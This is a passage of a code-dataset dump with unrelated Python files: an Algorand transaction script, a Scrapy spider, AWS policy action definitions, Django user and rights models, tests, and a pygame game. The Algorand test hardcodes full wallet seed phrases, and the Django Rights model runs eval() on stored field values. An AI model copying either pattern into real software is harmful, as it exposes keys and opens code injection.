pk,\n url = html_file,\n decimals = 0 )\n 
return txn\n\n\n\n\n# ----------------------- TEST ------------------------ #\n\nAlice = \"empower ill risk neglect manual piece kid hover goddess already casino labor crucial couch credit disorder below tennis magic whip away potato betray absorb reduce\"\nBob = \"require solution security ahead use jelly opera vessel absurd suit grape fork mix tattoo laundry chimney rebel example black swarm trim rib judge abandon nature\"\nCharlie = \"purse traffic harbor almost shine artist keen wrist crime diesel afford bus impact eagle winner once unfold uphold foster relax order nerve glove able disease\"\n\naccounts = {}\ncounter = 1\nfor m in [Alice, Bob, Charlie]:\n accounts[counter] = {}\n accounts[counter]['pk'] = mnemonic.to_public_key(m)\n accounts[counter]['sk'] = mnemonic.to_private_key(m)\n counter += 1\n\n# ----------------------------------------------------- #\n\n\n########## MAIN FUNCTION ##########\n\n# Specify your node address and token. This must be updated.\n\nalgod_address = \"http://localhost:4001\"\nalgod_token = \"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\"\n\n# Initialize an algod client\nalgod_client = algod.AlgodClient(algod_token=algod_token, algod_address=algod_address)\n\n# Get network params for transactions before every transaction.\nparams = algod_client.suggested_params()\n\ntxn = txn_switch(txn_type) #from userinput\n\n# Sign with secret key of transaction creator\nstxn = txn.sign(sk)\n\n# Send the transaction to the network and retrieve the txid.\ntxid = algod_client.send_transaction(stxn)\nprint(txid)\n\n\n# Wait for the transaction to be confirmed\nwait_for_confirmation(algod_client,txid)\n\n# Retrieve the asset ID of the newly created asset by first\n# ensuring that the creation transaction was confirmed,\n# then grabbing the asset id from the transaction.\nprintInformation(txn_type) # from user input\n","sub_path":"Verifiable_Document/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5704,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"148892519","text":"from source.module import Module\nfrom pathlib import Path\nimport os\nfrom .panel_finder.panel_finder import PanelFinder\nimport time\n\n\nclass PanelPredictor(Module):\n def __init__(self, parent=None, state=None):\n self.working_dir = Path(os.path.dirname(os.path.abspath(__file__)))\n super().__init__(self.working_dir, parent=parent, state=state)\n self.panel = None\n self.panel_finder = PanelFinder(self, state=state) # this panel finder needs no additional properties\n self.past_targets = []\n\n def process(self, frame):\n \"\"\"\n predicts where the center of the panel will be\n :param frame: an image that may contain a robot\n :return: ((x,y), confidence) coordinates of panel and confidence it will be there\n \"\"\"\n panel = self.panel_finder.process(frame)\n if panel is not None:\n panel, confidence = panel\n if len(self.past_targets) == self.properties[\"reference_frames\"]:\n self.past_targets.pop(0)\n self.past_targets.append((panel[\"x_center\"], panel[\"y_center\"], time.time(), confidence))\n if len(self.past_targets) == self.properties[\"reference_frames\"]:\n if self.properties[\"prediction_type\"] == \"linear\":\n return self.linear_prediction(frame)\n \n\n def linear_prediction(self, frame):\n frame_size = ((frame.shape[0]) ** 2 + (frame.shape[1]) ** 2) ** (1 / 2)\n distance = 1 / max(1e-3, frame.shape[1] / self.properties[\"distance_1m_height_rel\"] / 1080)\n velocity, distance_confidence = self.average_velocity(frame_size)\n foresight_time = time.time() - self.past_targets[-1][2] + self.properties[\"seconds_ahead\"]\n target = (round(self.past_targets[-1][0] + velocity[0] * foresight_time),\n round(self.past_targets[-1][1] + velocity[1] * foresight_time))\n foresight_confidence = (1 / (foresight_time * self.properties[\"time_confidence_falloff\"] + 1))\n cumulative_confidence = distance_confidence * foresight_confidence\n return target, distance, cumulative_confidence\n\n def average_velocity(self, max_distance):\n avg_velocity = [0, 0]\n error = 1\n data_points = (len(self.past_targets) - 1)\n for i in range(len(self.past_targets) - 1):\n pointA = self.past_targets[i]\n pointB = self.past_targets[i + 1]\n deltaX = pointB[0] - pointA[0]\n deltaY = pointB[1] - pointA[1]\n deltaT = pointB[2] - pointA[2]\n distance = (deltaX ** 2 + deltaY ** 2) ** (1 / 2) / max_distance\n avg_velocity[0] += deltaX / deltaT / data_points\n avg_velocity[1] += deltaY / deltaT / data_points\n distance_error = distance ** 2 / data_points * self.properties[\"distance_confidence_falloff\"]\n confidence = 1 / ((pointA[3] + pointB[3]) / 2)\n error += distance_error * confidence ** self.properties[\"model_confidence_weight\"]\n return avg_velocity, 1 / error\n","sub_path":"source/panel_predictor/panel_predictor.py","file_name":"panel_predictor.py","file_ext":"py","file_size_in_byte":3023,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"464884557","text":"# Copyright (c) 2012-2021, Mark Peek \n# All rights reserved.\n#\n# See LICENSE file for full license.\n\nfrom typing import Optional\n\nfrom .aws import Action as BaseAction\nfrom .aws import BaseARN\n\nservice_name = \"AWS Entity Resolution\"\nprefix = \"entityresolution\"\n\n\nclass Action(BaseAction):\n def __init__(self, action: Optional[str] = None) -> None:\n super().__init__(prefix, action)\n\n\nclass ARN(BaseARN):\n def __init__(self, resource: str = \"\", region: str = \"\", account: str = \"\") -> None:\n super().__init__(\n service=prefix, resource=resource, region=region, account=account\n )\n\n\nCreateMatchingWorkflow = Action(\"CreateMatchingWorkflow\")\nCreateSchemaMapping = Action(\"CreateSchemaMapping\")\nDeleteMatchingWorkflow = Action(\"DeleteMatchingWorkflow\")\nDeleteSchemaMapping = Action(\"DeleteSchemaMapping\")\nGetMatchId = Action(\"GetMatchId\")\nGetMatchingJob = Action(\"GetMatchingJob\")\nGetMatchingWorkflow = Action(\"GetMatchingWorkflow\")\nGetSchemaMapping = Action(\"GetSchemaMapping\")\nListMatchingJobs = Action(\"ListMatchingJobs\")\nListMatchingWorkflows = Action(\"ListMatchingWorkflows\")\nListSchemaMappings = Action(\"ListSchemaMappings\")\nListTagsForResource = Action(\"ListTagsForResource\")\nStartMatchingJob = Action(\"StartMatchingJob\")\nTagResource = Action(\"TagResource\")\nUntagResource = Action(\"UntagResource\")\nUpdateMatchingWorkflow = Action(\"UpdateMatchingWorkflow\")\n","sub_path":"awacs/entityresolution.py","file_name":"entityresolution.py","file_ext":"py","file_size_in_byte":1412,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"652058519","text":"# encoding=utf-8\nfrom django.db import models\nfrom django.contrib.auth.models import BaseUserManager, AbstractBaseUser\nimport datetime\nfrom core.tools import random_string\nfrom management.file_store import PersonalFile\n\nnow = datetime.datetime.now\n\n\ndef insert_user_in_system(user):\n user.company = Company.objects.get_or_create(owner=user)[0]\n user.rights = Rights.objects.get_or_create(owner=user)[0]\n user.save()\n\n\nclass UserManager(BaseUserManager):\n def create_user(self, email, password=None):\n if not email:\n raise ValueError('Users must have an email address')\n\n user = self.model(\n email=UserManager.normalize_email(email))\n\n user.set_password(password)\n user.save(using=self._db)\n insert_user_in_system(user)\n return user\n\n def create_superuser(self, email, password):\n user = self.create_user(email,\n password=password)\n user.is_admin = True\n user.is_active = True\n user.superuser = True\n user.save(using=self._db)\n insert_user_in_asast(user)\n return user\n\n def __unicode__(self):\n return u'%s %s' % (self.username, self.phone)\n\n\nclass User(AbstractBaseUser):\n ONLINE = 'ON'\n OFFLINE = 'OFF'\n STATUS_CHOICES = (\n (ONLINE, 'on-line'),\n (OFFLINE, 'off-line')\n )\n email = models.EmailField(\n verbose_name='email',\n max_length=255,\n unique=True,\n db_index=True)\n balance = models.IntegerField(verbose_name=u'Баланс', default=0)\n status = models.CharField(max_length=9, choices=STATUS_CHOICES, default=ONLINE)\n ban = models.BooleanField(verbose_name=u'Бан', default=False)\n reg_on = models.BooleanField(verbose_name=u'Запрос на регистрацию', default=False)\n token = models.CharField(max_length=200, default='', blank=True)\n is_active = models.BooleanField(default=False)\n is_admin = models.BooleanField(default=False)\n objects = UserManager()\n avatar = models.ForeignKey(PersonalFile, verbose_name=u'Аватар', blank=True, null=True)\n last_name = models.CharField(verbose_name=u'Фамилия', max_length=255, blank=True, default='')\n first_name = models.CharField(verbose_name=u'Имя', max_length=255, blank=True, default='')\n patronymic = models.CharField(verbose_name=u'Отчество', max_length=255, blank=True, default='')\n date_joined = models.DateTimeField(default=now)\n company = models.ForeignKey('Company', verbose_name=u'Компания', blank=True, null=True)\n rights = models.ForeignKey('Rights', verbose_name=u'Права', blank=True, null=True)\n phone = models.CharField(verbose_name=u\"Телефон\", max_length=50, default='', blank=True)\n skype = models.CharField(max_length=300, blank=True, default='')\n icq = models.CharField(max_length=300, blank=True, default='')\n news = models.BooleanField(verbose_name=u'Подписка', default=False)\n change_date = models.DateTimeField(verbose_name=u'Дата изменения', default=datetime.datetime.now)\n\n USERNAME_FIELD = 'email'\n\n def get_full_name(self):\n return '%s %s' % (self.first_name, self.last_name,)\n\n def get_short_name(self):\n return '%s' % (self.email,)\n\n def __unicode__(self):\n contact_name = ''\n if self.last_name:\n contact_name += '%s ' % self.last_name\n\n if self.first_name:\n contact_name += '%s.' % self.first_name\n\n if self.patronymic:\n contact_name += '%s. 
' % self.patronymic\n if not contact_name:\n contact_name = str(self.email)\n return contact_name\n\n def has_perm(self, perm, obj=None):\n return True\n\n def has_module_perms(self, app_label):\n return True\n\n @property\n def is_staff(self):\n return self.is_admin\n\n def save(self, *args, **kwargs):\n self.change_date = datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")\n super(User, self).save(*args, **kwargs)\n\n class Meta:\n verbose_name = u'Пользователя'\n verbose_name_plural = u'Пользователи'\n\n\nclass Company(models.Model):\n name = models.CharField(verbose_name=u'Название компании', max_length=300,\n blank=True, default=u'Без названия')\n owner = models.ForeignKey(User, verbose_name=u'Организотор', related_name='company_owner', null=True, unique=True)\n logo = models.ForeignKey(PersonalFile, verbose_name=u'Логотип', blank=True, null=True)\n date = models.DateField(verbose_name=u'Дата регистрации', default=now, editable=False)\n change_date = models.DateTimeField(verbose_name=u'Дата изменения', default=datetime.datetime.now)\n\n def __unicode__(self):\n return u'%s' % self.name\n\n def save(self, *args, **kwargs):\n self.change_date = datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")\n super(Company, self).save(*args, **kwargs)\n\n class Meta:\n verbose_name = u'Компания'\n verbose_name_plural = u'Компании'\n\n\nclass CompanyInvite(models.Model):\n user = models.ForeignKey(User, verbose_name=u'Приглашающий')\n email = models.CharField(verbose_name=u'Приглашенный', max_length=255)\n company = models.ForeignKey(Company, verbose_name=u'Компания')\n dialog = models.CharField(verbose_name=u'Диалог', max_length=255, blank=True)\n date = models.DateTimeField(verbose_name=u'Дата приглашения', blank=True)\n date_close = models.DateTimeField(verbose_name=u'Дата закрытия приглашения', blank=True, null=True)\n accept = models.BooleanField(verbose_name=u'Принято', default=False)\n cancel = models.BooleanField(verbose_name=u'Отклонено', default=False)\n\n def __unicode__(self):\n return u'%s %s %s %s' % (self.email, self.date, self.accept, self.cancel)\n\n class Meta:\n verbose_name = u'Приглашение в компанию'\n verbose_name_plural = u'Приглашения в компанию'\n\n\nclass Contact(models.Model):\n owner = models.ForeignKey(User, verbose_name=u'Организатор', related_name='facebook_owner', null=True)\n user = models.ForeignKey(User, verbose_name=u'Пользователь', related_name='user_in_row', blank=True, null=True)\n last_name = models.CharField(verbose_name=u'Фамилия', max_length=255, blank=True, default='')\n first_name = models.CharField(verbose_name=u'Имя', max_length=255, blank=True, default='')\n patronymic = models.CharField(verbose_name=u'Отчество', max_length=255, blank=True, default='')\n company = models.CharField(verbose_name=u'Компания', max_length=255, blank=True, default='')\n email = models.CharField(verbose_name=u'Email', blank=True, default='', max_length=255)\n phone = models.CharField(verbose_name=u\"Телефон\", max_length=50, default='', blank=True)\n description = models.TextField(verbose_name=u'Комментарий', blank=True, default='')\n change_date = models.DateTimeField(verbose_name=u'Дата изменения', default=datetime.datetime.now)\n\n def __unicode__(self):\n contact_name = ''\n if self.company:\n contact_name += '%s ' % self.company\n\n if self.last_name:\n contact_name += '%s ' % self.last_name\n\n if self.first_name:\n contact_name += '%s.' % self.first_name[0].upper()\n\n if self.patronymic:\n contact_name += '%s. 
' % self.patronymic[0].upper()\n\n if self.phone:\n contact_name += '+7 %s ' % self.phone\n\n if self.email:\n contact_name += '%s' % self.email\n\n return contact_name\n\n def save(self, *args, **kwargs):\n self.change_date = datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")\n if self.user:\n if not self.last_name:\n self.last_name = self.user.last_name\n if not self.first_name:\n self.first_name = self.user.first_name\n if not self.patronymic:\n self.patronymic = self.user.patronymic\n if not self.company:\n self.company = self.user.company\n if not self.email:\n self.email = self.user.email\n if not self.phone:\n self.phone = self.user.phone\n super(Contact, self).save(*args, **kwargs)\n\n class Meta:\n verbose_name = u'Контакт'\n verbose_name_plural = u'Контакты'\n\n\nclass Session(models.Model):\n not_closed = models.BooleanField(verbose_name=u'Вечная сессия', default=False)\n close = models.BooleanField(verbose_name=u'Закрыта', default=False)\n user = models.ForeignKey(User, verbose_name=u'Пользователь')\n key = models.CharField(verbose_name=u'Ключь сессии', blank=True, default='', max_length=255)\n start = models.DateTimeField(verbose_name=u'Дата открытия', default=now)\n last_connection = models.DateTimeField(verbose_name=u'Дата последней активности', default=now)\n device = models.TextField(verbose_name=u'Информация об устройстве', blank=True)\n live_time = models.IntegerField(verbose_name=u'Время жизни ( минуты )', default=60)\n\n def save(self, *args, **kwargs):\n if not self.key:\n self.key = random_string(10)\n super(Session, self).save(*args, **kwargs)\n\n def __unicode__(self):\n return u'%s %s %s' % (self.user, self.last_connection, self.live_time)\n\n class Meta:\n verbose_name = u'Сессия'\n verbose_name_plural = u'Сессии'\n\n\nclass Rights(models.Model):\n # 0 - Только я, 1 - Компания, 2 - Контакты, 3 - Остальные\n COMPANY_RIGHTS = (\n ('0', u'Только я'),\n ('1', u'Компания ')\n )\n owner = models.ForeignKey(User, verbose_name=u'Владелец', unique=True, related_name='rights_owner')\n session_twins = models.BooleanField(verbose_name=u'Множимый профиль', default=True)\n profile_access = models.CharField(verbose_name=u'Доступ к профилю',\n max_length=255, default=\"[1, 2, 3]\",\n help_text=u'0 - Только я, 1 - Компания, 2 - Контакты, 3 - Остальные')\n contact_access = models.CharField(verbose_name=u'Доступ в контактах',\n max_length=255, default=\"[1, 2, 3]\",\n help_text=u'0 - Только я, 1 - Компания, 2 - Контакты, 3 - Остальные')\n message_access = models.CharField(verbose_name=u'Писать личные сообщения',\n max_length=255, default=\"[1, 2, 3]\",\n help_text=u'0 - Только я, 1 - Компания, 2 - Контакты, 3 - Остальные')\n technique_access = models.CharField(verbose_name=u'Чтение информации о технике',\n max_length=255, default=\"[2, 3]\",\n help_text=u'0 - Только я, 1 - Компания, 2 - Контакты, 3 - Остальные')\n driver_access = models.CharField(verbose_name=u'Чтение информации о водителях',\n max_length=255, default=\"[2, 3]\",\n help_text=u'0 - Только я, 1 - Компания, 2 - Контакты, 3 - Остальные')\n facebook_access = models.CharField(verbose_name=u'Доступ к списку контактов',\n max_length=1, choices=COMPANY_RIGHTS, default=\"1\")\n tracker_install = models.CharField(verbose_name=u'Установка трекера',\n max_length=1, choices=COMPANY_RIGHTS, default=\"1\")\n report_order = models.CharField(verbose_name=u'Заказ отчетов',\n max_length=1, choices=COMPANY_RIGHTS, default=\"1\")\n edit_technique = models.CharField(verbose_name=u'Редактирование техники',\n max_length=1, 
choices=COMPANY_RIGHTS, default=\"1\")\n edit_driver = models.CharField(verbose_name=u'Редактирование водителей',\n max_length=1, choices=COMPANY_RIGHTS, default=\"1\")\n edit_order = models.CharField(verbose_name=u'Редактирование заказов',\n max_length=1, choices=COMPANY_RIGHTS, default=\"1\")\n del_technique = models.CharField(verbose_name=u'Удаление техники',\n max_length=1, choices=COMPANY_RIGHTS, default=\"1\")\n del_driver = models.CharField(verbose_name=u'Удаление водителей',\n max_length=1, choices=COMPANY_RIGHTS, default=\"1\")\n del_order = models.CharField(verbose_name=u'Удаление заказов',\n max_length=1, choices=COMPANY_RIGHTS, default=\"1\")\n invite_in_company = models.BooleanField(verbose_name=u'Приглашать в компанию', default=True)\n del_from_company = models.BooleanField(verbose_name=u'Удалять из компании', default=True)\n\n def __unicode__(self):\n return u'%s: %s' % (self.id, self.owner)\n\n def check_right_for_user(self, user, right):\n # Проверка доступа пользователю\n result = False\n if user == self.owner:\n result = True\n else:\n type_in = get_someone_for_user_type(user, self.owner)\n n = eval(str(self._meta._name_map[right][0].value_from_object(self)))\n if type(n) != list:\n accept_groups = [n]\n else:\n accept_groups = n\n for i in type_in:\n if i in accept_groups:\n result = True\n return result\n\n def get_rights_list(self, right):\n # Получение списка груп для права\n return eval(self._meta._name_map[right][0].value_from_object(self))\n\n class Meta:\n verbose_name = u'Право'\n verbose_name_plural = u'Права'\n\n\ndef get_someone_for_user_type(someone, user):\n # Получение типа прав пользователя\n result = []\n if user == someone:\n result.append(0)\n if user.company == someone.company:\n result.append(1)\n if Contact.objects.filter(owner=user, email=someone.email).exists():\n result.append(2)\n if someone.is_authenticated():\n result.append(3)\n return result\n","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":15071,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"445977332","text":"\"\"\"Spider for scraping revisions via the Wikipedia API.\"\"\"\n\n# pylint: disable=R0913,R0201\n\n# Standard lib imports\nimport os\nimport json\nfrom collections import OrderedDict\n# Scrapy imports\nfrom scrapy import Spider, Request\n# ISS Wikipedia imports\nfrom src.utils import get_usernames\nfrom src.utils.web import add_urlparams\nfrom webscraping.items import WikiRevisionItem\n\nDIR_PATH = os.path.dirname(__file__)\nROOT_PATH = os.path.join(DIR_PATH, '..', '..')\nUSERS = get_usernames()\n\n\nclass WikiRevisions(Spider):\n \"\"\"Spider scraping revisions via the Wikipedia API.\"\"\"\n name = 'revisions'\n base_url = 'https://en.wikipedia.org/w/api.php'\n usernames = USERS\n\n pages = OrderedDict()\n\n # Settings\n custom_settings = {\n 'ITEM_PIPELINES': {\n 'webscraping.pipelines.WikiRevisionsPipeline': 300\n }\n }\n\n # Methods -----------------------------------------------------------------\n\n def start_requests(self):\n \"\"\"Custom start method.\"\"\"\n for user in self.usernames:\n url = self.make_url(user)\n request = Request(url, callback=self.parse)\n request.meta['user_name'] = user\n yield request\n\n def parse(self, response):\n \"\"\"Spider parsing method.\"\"\"\n user = response.meta['user_name']\n data = json.loads(response.body_as_unicode())\n item = WikiRevisionItem(user_name=user, revisions=data)\n yield item\n\n # Look for continuation parameter\n if 'continue' in data:\n cont = data['continue']['arvcontinue']\n url = self.make_url(user, cont=cont)\n request = Request(url, callback=self.parse)\n request.meta['user_name'] = user\n yield request\n\n def make_url(self, user, props='ids|flags|timestamp|size|tags',\n limit=500, frm='json', cont=None, **kwargs):\n \"\"\"Make url for API request.\"\"\"\n params = {\n 'action': 'query',\n 'list': 'allrevisions',\n 'arvuser': user,\n 'arvlimit': limit,\n 'arvprop': props,\n 'format': frm,\n **kwargs\n }\n if cont:\n params.update(arvcontinue=cont)\n url = add_urlparams(self.base_url, params)\n return url\n","sub_path":"webscraping/spiders/revisions.py","file_name":"revisions.py","file_ext":"py","file_size_in_byte":2274,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"497247307","text":"import os\nimport shutil\nimport tempfile\nimport time\nfrom os import mkdir, getcwd\n\nfrom click.testing import CliRunner\nfrom watchdog import events\n\nfrom kudu.commands import link\n\n\ndef test_interface_path_converter():\n dst = os.path.join(tempfile.gettempdir(), str(time.time()))\n mkdir(dst)\n\n runner = CliRunner()\n with runner.isolated_filesystem():\n src = getcwd()\n\n mkdir('interface')\n open(os.path.join('interface', 'test.html'), 'wb').close()\n\n link.copyfiles(\n src, dst,\n link.InterfacePathConverter({'filename': 'interface_xy.zip'})\n )\n assert os.path.exists(os.path.join(dst, 'interface_xy', 'test.html'))\n\n shutil.rmtree(dst)\n\n\ndef test_presentation_path_converter():\n dst = os.path.join(tempfile.gettempdir(), str(time.time()))\n mkdir(dst)\n\n runner = CliRunner()\n with runner.isolated_filesystem():\n src = getcwd()\n\n open('index.html', 'wb').close()\n open('thumbnail.png', 'wb').close()\n mkdir('iPadOnly')\n open(os.path.join('iPadOnly', 'iPad.html'), 'wb').close()\n\n link.copyfiles(\n src, dst,\n link.PresentationPathConverter({'filename': '1234_4321.zip'})\n )\n assert os.path.exists(\n os.path.join(dst, 'slides', '1234_4321', 'index.html')\n )\n assert os.path.exists(\n os.path.join(dst, 'slides', '1234_4321', '1234_4321.png')\n )\n assert os.path.exists(\n os.path.join(dst, 'slides', '1234_4321', 'iPad.html')\n )\n\n shutil.rmtree(dst)\n\n\ndef test_copy_files_event_handler():\n dst = os.path.join(tempfile.gettempdir(), str(time.time()))\n mkdir(dst)\n\n runner = CliRunner()\n with runner.isolated_filesystem():\n src = getcwd()\n converter = link.PresentationPathConverter({\n 'filename': '1234_4321.zip'\n })\n event_handler = link.CopyFilesEventHandler(src, dst, converter)\n\n class TestEvent(object):\n event_type = events.EVENT_TYPE_MODIFIED\n src_path = os.path.join(src, 'index.html')\n is_directory = False\n\n open('index.html', 'wb').close()\n event_handler.on_any_event(TestEvent)\n\n assert os.path.exists(\n os.path.join(dst, 'slides', '1234_4321', 'index.html')\n )\n\n shutil.rmtree(dst)\n","sub_path":"kudu/tests/test_link.py","file_name":"test_link.py","file_ext":"py","file_size_in_byte":2357,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"66470273","text":"import pygame\r\nimport random\r\n\r\nKEY_UP = 273\r\nKEY_DOWN = 274\r\nKEY_LEFT = 276\r\nKEY_RIGHT = 275\r\nKEY_ENTER = 13\r\nKEY_Q = 113\r\nplay_again = True\r\nlevel_counter = 1\r\n\r\n\r\ndef overlap(c1, c2):\r\n if (c2.x in xrange(c1.x,c1.x + c1.dimensions[2]) and c2.y in xrange(c1.y, c1.y + c1.dimensions[3])) or (c2.x + c2.dimensions[2] in xrange(c1.x,c1.x + c1.dimensions[2]) and c2.y + c2.dimensions[3] in xrange(c1.y, c1.y + c1.dimensions[3])):\r\n return True\r\n else:\r\n return False\r\n\r\nclass Character(object):\r\n def __init__(self,image,screen):\r\n self.image = image\r\n self.dimensions = image.get_rect()\r\n self.bounds = screen.get_rect()\r\n\r\n def get_location(self):\r\n return (self.x,self.y)\r\n\r\nclass Enemy(Character):\r\n def __init__(self,image,screen,others):\r\n self.image = image\r\n self.dimensions = image.get_rect()\r\n self.bounds = screen.get_rect()\r\n self.set_location(others)\r\n self.direction_speed = 1\r\n self.change_direction()\r\n\r\n def change_direction(self):\r\n self.x_speed = random.randint(-1,1)\r\n self.y_speed = random.randint(-1,1)\r\n self.x_speed *= self.direction_speed\r\n self.y_speed *= self.direction_speed\r\n\r\n def set_location(self,others):\r\n self.x = random.randint(self.bounds[0],self.bounds[2] - self.dimensions[2])\r\n self.y = random.randint(self.bounds[1],self.bounds[3] - self.dimensions[3])\r\n resetFlag = False\r\n for i in others:\r\n if overlap(i,self):\r\n resetFlag = True\r\n if resetFlag:\r\n self.set_location(others)\r\n\r\n def move(self):\r\n if self.x <= self.bounds[2] and self.y <= self.bounds[3] and self.x >= self.bounds[0] - self.dimensions[2] and self.y >= self.bounds[1] - self.dimensions[3]:\r\n self.x += self.x_speed\r\n self.y += self.y_speed\r\n elif self.x > self.bounds[2]:\r\n self.x = self.bounds[0] - self.dimensions[2]\r\n elif self.y > self.bounds[3]:\r\n self.y = self.bounds[1] - self.dimensions[3]\r\n elif self.x < self.bounds[0] - self.dimensions[2]:\r\n self.x = self.bounds[2]\r\n elif self.y < self.bounds[3] - self.dimensions[3]:\r\n self.y = self.bounds[3]\r\n\r\nclass Goblin(Enemy):\r\n def __init__(self,image,screen,others):\r\n self.image = image\r\n self.dimensions = image.get_rect()\r\n self.bounds = screen.get_rect()\r\n self.set_location(others)\r\n self.direction_speed = 1\r\n self.change_direction()\r\n\r\nclass Hero(Character):\r\n def __init__(self,image,screen):\r\n self.image = image\r\n self.dimensions = image.get_rect()\r\n self.bounds = screen.get_rect()\r\n for i in xrange(len(self.bounds)/2):\r\n self.bounds[i] += 32\r\n self.bounds[i+2] -= 32\r\n #self.bounds = list(self.bounds) + [32, 32, -32, -32]\r\n self.x = self.bounds[2]/2 - self.dimensions[2]/2\r\n self.y = self.bounds[3]/2 - self.dimensions[3]/2\r\n self.x_speed = 0\r\n self.y_speed = 0\r\n\r\n def set_speed(self, direction, speed):\r\n if direction == \"x\":\r\n self.x_speed = 2 * speed\r\n else:\r\n self.y_speed = 2 * speed\r\n\r\n def move(self):\r\n if self.x + self.dimensions[2] <= self.bounds[2] and self.y + self.dimensions[3] <= self.bounds[3] and self.x >= self.bounds[0] and self.y >= self.bounds[1]:\r\n self.x += self.x_speed\r\n self.y += self.y_speed\r\n elif self.x + self.dimensions[2] > self.bounds[2]:\r\n self.x = self.bounds[2] - self.dimensions[2]\r\n elif self.y + self.dimensions[3] > self.bounds[3]:\r\n self.y = self.bounds[3] - self.dimensions[3]\r\n elif self.x < self.bounds[0]:\r\n self.x = self.bounds[0]\r\n elif self.y < self.bounds[1]:\r\n self.y = 
self.bounds[1]\r\n\r\nclass Monster(Enemy):\r\n def __init__(self,image,screen,others):\r\n self.image = image\r\n self.dimensions = image.get_rect()\r\n self.bounds = screen.get_rect()\r\n self.set_location(others)\r\n self.direction_speed = 3\r\n self.change_direction()\r\n\r\n\r\n\r\n\r\ndef main():\r\n global play_again, level_counter\r\n play_again = False\r\n # declare the size of the canvas\r\n background_image = pygame.image.load('images/background.png')\r\n\r\n x,y,width,height = background_image.get_rect()\r\n blue_color = (97, 159, 182)\r\n\r\n pygame.init()\r\n screen = pygame.display.set_mode((width, height))\r\n pygame.display.set_caption('Simple Example')\r\n clock = pygame.time.Clock()\r\n tick = clock.tick()\r\n game_music = pygame.mixer.Sound('sounds/music.wav')\r\n\r\n characters = []\r\n\r\n # Game initialization\r\n hero_image = pygame.image.load('images/hero.png').convert_alpha()\r\n hero = Hero(hero_image,screen)\r\n characters.append(hero)\r\n\r\n monster_image = pygame.image.load('images/monster.png').convert_alpha()\r\n monster = Monster(monster_image,screen,characters)\r\n characters.append(monster)\r\n\r\n num_goblins = 3 + level_counter - 1\r\n goblins = []\r\n goblin_image = pygame.image.load('images/goblin.png').convert_alpha()\r\n for i in xrange(num_goblins):\r\n goblin = Goblin(goblin_image,screen,characters)\r\n characters.append(goblin)\r\n goblins.append(goblin)\r\n\r\n\r\n stop_game = False\r\n quit_game = False\r\n end_condition = ''\r\n game_music.play(-1)\r\n font = pygame.font.Font(None, 30)\r\n level_text = font.render('Level %d' % level_counter, True, (0, 0, 0), (255,255,255))\r\n\r\n while not stop_game:\r\n for event in pygame.event.get():\r\n # Event handling\r\n if event.type == pygame.QUIT:\r\n stop_game = True\r\n quit_game = True\r\n if event.type == pygame.KEYDOWN:\r\n # activate the corresponding speeds\r\n # when an arrow key is pressed down\r\n if event.key == KEY_DOWN:\r\n hero.set_speed(\"y\",1)\r\n elif event.key == KEY_UP:\r\n hero.set_speed(\"y\",-1)\r\n elif event.key == KEY_LEFT:\r\n hero.set_speed(\"x\",-1)\r\n elif event.key == KEY_RIGHT:\r\n hero.set_speed(\"x\",1)\r\n\r\n if event.type == pygame.KEYUP:\r\n # deactivate the corresponding speeds\r\n # when an arrow key is released\r\n if event.key == KEY_DOWN:\r\n hero.set_speed(\"y\",0)\r\n elif event.key == KEY_UP:\r\n hero.set_speed(\"y\",0)\r\n elif event.key == KEY_LEFT:\r\n hero.set_speed(\"x\",0)\r\n elif event.key == KEY_RIGHT:\r\n hero.set_speed(\"x\",0)\r\n\r\n if overlap(hero, monster):\r\n stop_game = True\r\n sound = pygame.mixer.Sound('sounds/win.wav')\r\n sound.play()\r\n end_condition = 'win'\r\n\r\n for i in goblins:\r\n if overlap(hero, i):\r\n stop_game = True\r\n sound = pygame.mixer.Sound('sounds/lose.wav')\r\n sound.play()\r\n end_condition = 'lose'\r\n\r\n hero.move()\r\n monster.move()\r\n for i in goblins:\r\n i.move()\r\n\r\n if tick > 2000:\r\n monster.change_direction()\r\n for i in goblins:\r\n i.change_direction()\r\n tick = 0\r\n\r\n # Draw background\r\n screen.blit(background_image, (0,0))\r\n\r\n # Game display\r\n screen.blit(level_text,(32,32))\r\n screen.blit(hero.image, hero.get_location())\r\n screen.blit(monster.image, monster.get_location())\r\n for i in goblins:\r\n screen.blit(i.image, i.get_location())\r\n\r\n\r\n pygame.display.update()\r\n\r\n tick += clock.tick()\r\n\r\n\r\n game_music.stop()\r\n if end_condition == 'win':\r\n level_counter += 1\r\n else:\r\n level_counter = 1\r\n\r\n while not quit_game:\r\n for event in 
pygame.event.get():\r\n # Event handling\r\n if event.type == pygame.QUIT:\r\n quit_game = True\r\n if event.type == pygame.KEYDOWN:\r\n # activate the corresponding speeds\r\n # when an arrow key is pressed down\r\n if event.key == KEY_ENTER:\r\n play_again = True\r\n quit_game = True\r\n if event.key == KEY_Q:\r\n quit_game = True\r\n\r\n\r\n screen.blit(background_image, (0,0))\r\n screen.blit(hero.image, hero.get_location())\r\n font = pygame.font.Font(None, 50)\r\n text = font.render('press ENTER to play again', True, (0, 0, 0))\r\n text2 = font.render('press Q to quit ', True, (0, 0, 0))\r\n if end_condition == 'win':\r\n text3 = font.render('You win!', True, (0, 0, 0))\r\n else:\r\n text3 = font.render('You lose!', True, (0, 0, 0))\r\n screen.blit(text, (32, height/2))\r\n screen.blit(text2, (32, height/2 + 75))\r\n screen.blit(text3, (32, height/2 - 75))\r\n pygame.display.update()\r\n\r\n pygame.quit()\r\n\r\nif __name__ == '__main__':\r\n while play_again:\r\n 